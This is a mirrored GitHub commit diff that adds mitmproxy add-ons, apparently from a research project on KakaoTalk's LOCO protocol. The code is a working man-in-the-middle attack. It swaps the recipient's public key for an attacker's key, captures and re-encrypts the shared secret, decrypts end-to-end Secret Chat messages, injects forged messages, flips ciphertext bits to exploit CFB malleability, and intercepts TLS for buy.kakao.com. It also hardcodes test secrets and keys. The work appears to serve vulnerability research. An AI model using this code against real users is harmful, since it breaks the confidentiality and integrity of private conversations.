mirror of
https://github.com/stulle123/kakaotalk_analysis.git
synced 2025-05-07 12:06:09 +00:00
Add more add-ons
This commit is contained in:
stulle123
parent
54f315d57a
commit
0ee41ca2a6
|
|
@ -7,15 +7,15 @@ from mitmproxy import connection, tcp, tls
|
||||||
from mitmproxy.utils import human, strutils
|
from mitmproxy.utils import human, strutils
|
||||||
|
|
||||||
|
|
||||||
class LocoMitm:
|
class LocoMitmBase:
|
||||||
def __init__(self, rsa_key_pair, master_secret=None) -> None:
|
def __init__(self, rsa_key_pair, master_secret=None, test_key=None) -> None:
|
||||||
self.parser = LocoParser()
|
self.parser = LocoParser()
|
||||||
self.rsa_key_pair = rsa_key_pair
|
self.rsa_key_pair = rsa_key_pair
|
||||||
self.recipient_user_id = 0
|
self.recipient_user_id = 0
|
||||||
self.recipient_public_key = b""
|
self.recipient_public_key = b""
|
||||||
self.shared_secret = b""
|
self.shared_secret = b""
|
||||||
self.master_secret = master_secret
|
self.master_secret = master_secret
|
||||||
self.e2e_encryption_key = None
|
self.e2e_encryption_key = test_key
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def get_addr(server: connection.Server):
|
def get_addr(server: connection.Server):
|
||||||
|
|
@ -26,15 +26,15 @@ class LocoMitm:
|
||||||
logging.info("Skip TLS intercept for %s.", human.format_address(server_address))
|
logging.info("Skip TLS intercept for %s.", human.format_address(server_address))
|
||||||
data.ignore_connection = True
|
data.ignore_connection = True
|
||||||
|
|
||||||
|
|
||||||
|
class SecretChatMitm(LocoMitmBase):
|
||||||
def compute_e2e_encryption_key(self, shared_secret):
|
def compute_e2e_encryption_key(self, shared_secret):
|
||||||
if not self.e2e_encryption_key:
|
if not self.e2e_encryption_key:
|
||||||
logging.info(
|
|
||||||
"Computing E2E encryption key with shared secret: %s", shared_secret
|
|
||||||
)
|
|
||||||
self.e2e_encryption_key = self.parser.get_e2e_encryption_key(shared_secret)
|
self.e2e_encryption_key = self.parser.get_e2e_encryption_key(shared_secret)
|
||||||
else:
|
|
||||||
logging.info(
|
logging.info(
|
||||||
"E2E encryption key: %s", base64.b64encode(self.e2e_encryption_key)
|
"Shared secret: %s E2E encryption key: %s",
|
||||||
|
shared_secret,
|
||||||
|
base64.b64encode(self.e2e_encryption_key),
|
||||||
)
|
)
|
||||||
|
|
||||||
def tcp_message(self, flow: tcp.TCPFlow):
|
def tcp_message(self, flow: tcp.TCPFlow):
|
||||||
|
|
@ -47,76 +47,90 @@ class LocoMitm:
|
||||||
message.from_client,
|
message.from_client,
|
||||||
self.parser.loco_packet.get_packet_as_dict(),
|
self.parser.loco_packet.get_packet_as_dict(),
|
||||||
)
|
)
|
||||||
|
else:
|
||||||
|
logging.warning(
|
||||||
|
"from_client=%s, raw packet bytes=%s",
|
||||||
|
message.from_client,
|
||||||
|
strutils.bytes_to_escaped_str(message.content),
|
||||||
|
)
|
||||||
|
|
||||||
|
return
|
||||||
|
|
||||||
# If there's already a shared secret stored on the server remove it from the LOCO packet
|
# If there's already a shared secret stored on the server remove it from the LOCO packet
|
||||||
if (
|
if not message.from_client and self.parser.loco_packet.loco_command in {
|
||||||
not message.from_client
|
"SCREATE",
|
||||||
and self.parser.loco_packet
|
"CHATONROOM",
|
||||||
and self.parser.loco_packet.loco_command in {"SCREATE", "CHATONROOM"}
|
}:
|
||||||
):
|
|
||||||
if isinstance(self.parser.loco_packet.body_payload, bytes):
|
if isinstance(self.parser.loco_packet.body_payload, bytes):
|
||||||
logging.error(
|
logging.warning(
|
||||||
"Dropping %s packet as we cannot decode the packet body.",
|
"Dropping %s packet as we cannot decode the packet body.",
|
||||||
self.parser.loco_packet.loco_command,
|
self.parser.loco_packet.loco_command,
|
||||||
)
|
)
|
||||||
message.content = b""
|
message.content = b""
|
||||||
return
|
return
|
||||||
|
|
||||||
tampered_packet = self.parser.remove_stored_shared_secret(
|
tampered_packet = self.parser.remove_stored_shared_secret()
|
||||||
self.recipient_user_id
|
|
||||||
)
|
|
||||||
if tampered_packet:
|
if tampered_packet:
|
||||||
message.content = tampered_packet
|
message.content = tampered_packet
|
||||||
|
|
||||||
# Get recipient's public key and replace it with our MITM public key
|
# Get recipient's public key and replace it with our MITM public key
|
||||||
if (
|
if (
|
||||||
not self.master_secret
|
not self.master_secret
|
||||||
and self.parser.loco_packet
|
|
||||||
and not message.from_client
|
and not message.from_client
|
||||||
and self.parser.loco_packet.loco_command
|
and self.parser.loco_packet.loco_command
|
||||||
in {"GETPK", "GETLPK", "SCREATE", "CHATONROOM"}
|
in {"GETPK", "GETLPK", "SCREATE", "CHATONROOM"}
|
||||||
):
|
):
|
||||||
logging.info("Trying to parse recipient's public key from LOCO packet...")
|
logging.info("Trying to parse recipient's public key from LOCO packet...")
|
||||||
(
|
(
|
||||||
self.recipient_public_key,
|
recipient_public_key,
|
||||||
self.recipient_user_id,
|
self.recipient_user_id,
|
||||||
tampered_packet,
|
tampered_packet,
|
||||||
) = self.parser.inject_public_key(self.rsa_key_pair)
|
) = self.parser.inject_public_key(self.rsa_key_pair)
|
||||||
|
|
||||||
if (
|
if not recipient_public_key:
|
||||||
not self.recipient_public_key
|
|
||||||
or not self.recipient_user_id
|
|
||||||
or not tampered_packet
|
|
||||||
):
|
|
||||||
logging.error(
|
logging.error(
|
||||||
"Could not inject MITM public key into %s packet.",
|
"Could not parse recipient public key from %s packet.",
|
||||||
|
self.parser.loco_packet.loco_command,
|
||||||
|
)
|
||||||
|
return
|
||||||
|
else:
|
||||||
|
self.recipient_public_key = recipient_public_key
|
||||||
|
|
||||||
|
if not self.recipient_user_id:
|
||||||
|
logging.error(
|
||||||
|
"Could not parse recipient user ID from %s packet.",
|
||||||
|
self.parser.loco_packet.loco_command,
|
||||||
|
)
|
||||||
|
return
|
||||||
|
|
||||||
|
if not tampered_packet:
|
||||||
|
logging.error(
|
||||||
|
"Could not create a fake %s packet.",
|
||||||
self.parser.loco_packet.loco_command,
|
self.parser.loco_packet.loco_command,
|
||||||
)
|
)
|
||||||
return
|
return
|
||||||
|
|
||||||
message.content = tampered_packet
|
|
||||||
logging.info("Injecting MITM public key...")
|
logging.info("Injecting MITM public key...")
|
||||||
|
message.content = tampered_packet
|
||||||
# logging.info("Tampered packet: %s", self.parser.loco_packet.get_packet_as_dict())
|
# logging.info("Tampered packet: %s", self.parser.loco_packet.get_packet_as_dict())
|
||||||
|
|
||||||
# Grab the shared secret which is used to compute the E2E encryption key
|
# Grab the shared secret from the "SETSK" packet
|
||||||
if (
|
if (
|
||||||
self.recipient_public_key
|
self.recipient_public_key
|
||||||
and not self.master_secret
|
and not self.master_secret
|
||||||
and self.parser.loco_packet
|
|
||||||
and message.from_client
|
and message.from_client
|
||||||
and self.parser.loco_packet.loco_command == "SETSK"
|
and self.parser.loco_packet.loco_command == "SETSK"
|
||||||
):
|
):
|
||||||
logging.info("Trying to parse shared secret from LOCO packet...")
|
logging.info("Trying to parse shared secret from LOCO packet...")
|
||||||
|
|
||||||
self.shared_secret = self.parser.get_shared_secret(self.rsa_key_pair)
|
shared_secret = self.parser.get_shared_secret(self.rsa_key_pair)
|
||||||
|
|
||||||
if not self.shared_secret:
|
if not shared_secret:
|
||||||
logging.error("Couldn't parse shared secret from LOCO packet.")
|
logging.error("Couldn't parse shared secret from LOCO packet.")
|
||||||
# TODO: remove
|
|
||||||
logging.info("Dropping SETSK packet...")
|
|
||||||
message.content = b""
|
|
||||||
return
|
return
|
||||||
|
|
||||||
|
self.shared_secret = shared_secret
|
||||||
logging.info("Shared secret: %s", self.shared_secret)
|
logging.info("Shared secret: %s", self.shared_secret)
|
||||||
|
|
||||||
# Re-encrypt shared secret with the recipient's original public key
|
# Re-encrypt shared secret with the recipient's original public key
|
||||||
|
|
@ -131,9 +145,6 @@ class LocoMitm:
|
||||||
logging.info(
|
logging.info(
|
||||||
"Re-encrypted shared secret with recipient's original public key."
|
"Re-encrypted shared secret with recipient's original public key."
|
||||||
)
|
)
|
||||||
# TODO: remove
|
|
||||||
logging.info("Dropping SETSK packet...")
|
|
||||||
message.content = b""
|
|
||||||
|
|
||||||
# Compute E2E encryption key
|
# Compute E2E encryption key
|
||||||
if self.shared_secret:
|
if self.shared_secret:
|
||||||
|
|
@ -143,21 +154,15 @@ class LocoMitm:
|
||||||
self.compute_e2e_encryption_key(self.master_secret)
|
self.compute_e2e_encryption_key(self.master_secret)
|
||||||
|
|
||||||
# Decrypt Secret Chat end-to-end encrypted message
|
# Decrypt Secret Chat end-to-end encrypted message
|
||||||
if (
|
if self.e2e_encryption_key and (
|
||||||
self.e2e_encryption_key
|
(message.from_client and self.parser.loco_packet.loco_command == "SWRITE")
|
||||||
and self.parser.loco_packet
|
or (
|
||||||
and (
|
not message.from_client
|
||||||
(
|
and self.parser.loco_packet.loco_command == "MSG"
|
||||||
message.from_client
|
|
||||||
and self.parser.loco_packet.loco_command == "SWRITE"
|
|
||||||
)
|
|
||||||
or (
|
|
||||||
not message.from_client
|
|
||||||
and self.parser.loco_packet.loco_command == "MSG"
|
|
||||||
)
|
|
||||||
)
|
)
|
||||||
):
|
):
|
||||||
logging.info("Trying to decrypt E2E message...")
|
logging.info("Trying to decrypt Secret Chat message...")
|
||||||
|
decrypted_e2e_message = ""
|
||||||
|
|
||||||
if self.master_secret:
|
if self.master_secret:
|
||||||
decrypted_e2e_message = self.parser.get_decrypted_e2e_message(
|
decrypted_e2e_message = self.parser.get_decrypted_e2e_message(
|
||||||
|
|
@ -169,33 +174,91 @@ class LocoMitm:
|
||||||
)
|
)
|
||||||
|
|
||||||
if decrypted_e2e_message:
|
if decrypted_e2e_message:
|
||||||
logging.warning(
|
logging.info(
|
||||||
"from_client=%s, content=%s",
|
"from_client=%s, Secret Chat message=%s",
|
||||||
message.from_client,
|
message.from_client,
|
||||||
decrypted_e2e_message,
|
decrypted_e2e_message,
|
||||||
)
|
)
|
||||||
|
|
||||||
if not self.parser.loco_packet:
|
|
||||||
|
class InjectMessage(LocoMitmBase):
|
||||||
|
def __init__(self) -> None:
|
||||||
|
self.parser = LocoParser()
|
||||||
|
|
||||||
|
def tcp_message(self, flow: tcp.TCPFlow):
|
||||||
|
message = flow.messages[-1]
|
||||||
|
self.parser.parse(message.content)
|
||||||
|
|
||||||
|
if self.parser.loco_packet:
|
||||||
|
logging.info(
|
||||||
|
"from_client=%s, content=%s",
|
||||||
|
message.from_client,
|
||||||
|
self.parser.loco_packet.get_packet_as_dict(),
|
||||||
|
)
|
||||||
|
else:
|
||||||
logging.warning(
|
logging.warning(
|
||||||
"from_client=%s, raw packet bytes=%s",
|
"from_client=%s, raw packet bytes=%s",
|
||||||
message.from_client,
|
message.from_client,
|
||||||
strutils.bytes_to_escaped_str(message.content),
|
strutils.bytes_to_escaped_str(message.content),
|
||||||
)
|
)
|
||||||
|
|
||||||
# Inject a new message to show there are no integrity checks on the ciphertext
|
return
|
||||||
# tampered_packet = parser.inject_message("foo", "bar")
|
|
||||||
|
|
||||||
# if tampered_packet:
|
# Inject a new message to show that there are no integrity checks on the ciphertext
|
||||||
# message.content = tampered_packet
|
tampered_packet = self.parser.inject_message("foo", "bar")
|
||||||
|
|
||||||
|
if tampered_packet:
|
||||||
|
message.content = tampered_packet
|
||||||
|
|
||||||
|
|
||||||
|
class FlipCiphertextBits(LocoMitmBase):
|
||||||
|
def tcp_message(self, flow: tcp.TCPFlow):
|
||||||
|
message = flow.messages[-1]
|
||||||
|
self.parser.parse(message.content)
|
||||||
|
|
||||||
|
if self.parser.loco_packet:
|
||||||
|
logging.info(
|
||||||
|
"from_client=%s, content=%s",
|
||||||
|
message.from_client,
|
||||||
|
self.parser.loco_packet.get_packet_as_dict(),
|
||||||
|
)
|
||||||
|
else:
|
||||||
|
logging.warning(
|
||||||
|
"from_client=%s, raw packet bytes=%s",
|
||||||
|
message.from_client,
|
||||||
|
strutils.bytes_to_escaped_str(message.content),
|
||||||
|
)
|
||||||
|
|
||||||
|
return
|
||||||
|
|
||||||
# Flip bits of the ciphertext to show CFB malleability
|
# Flip bits of the ciphertext to show CFB malleability
|
||||||
# flipped_packet = parser.flip_bits()
|
flipped_packet = self.parser.flip_bits()
|
||||||
|
|
||||||
# if flipped_packet:
|
if flipped_packet:
|
||||||
# message.content = flipped_packet
|
message.content = flipped_packet
|
||||||
|
|
||||||
|
|
||||||
# TODO: rename to 'test_secret'
|
class TLSIntercept:
|
||||||
master_secret = b"AAAAAAAAAAAAAAAAAAAAAA=="
|
@staticmethod
|
||||||
|
def get_addr(server: connection.Server):
|
||||||
|
return server.peername or server.address
|
||||||
|
|
||||||
addons = [LocoMitm(rsa_key_pair=get_rsa_key_pair())]
|
def tls_clienthello(self, data: tls.ClientHelloData):
|
||||||
|
if data.context.client.sni == "buy.kakao.com":
|
||||||
|
logging.info("MITM buy.kakao.com")
|
||||||
|
return
|
||||||
|
else:
|
||||||
|
server_address = self.get_addr(data.context.server)
|
||||||
|
logging.info(
|
||||||
|
"Skip TLS intercept for %s.", human.format_address(server_address)
|
||||||
|
)
|
||||||
|
data.ignore_connection = True
|
||||||
|
|
||||||
|
|
||||||
|
test_secret = b"AAAAAAAAAAAAAAAAAAAAAA=="
|
||||||
|
test_e2e_key = base64.b64decode("H1mnODpo+XZ+SEF8nR8p/ZYpNpAaLBLgB98E0tF+7Ek=")
|
||||||
|
|
||||||
|
# addons = [SecretChatMitm(rsa_key_pair=get_rsa_key_pair())]
|
||||||
|
# addons = [InjectMessage()]
|
||||||
|
# addons = [FlipCiphertextBits()]
|
||||||
|
addons = [TLSIntercept()]
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue
Block a user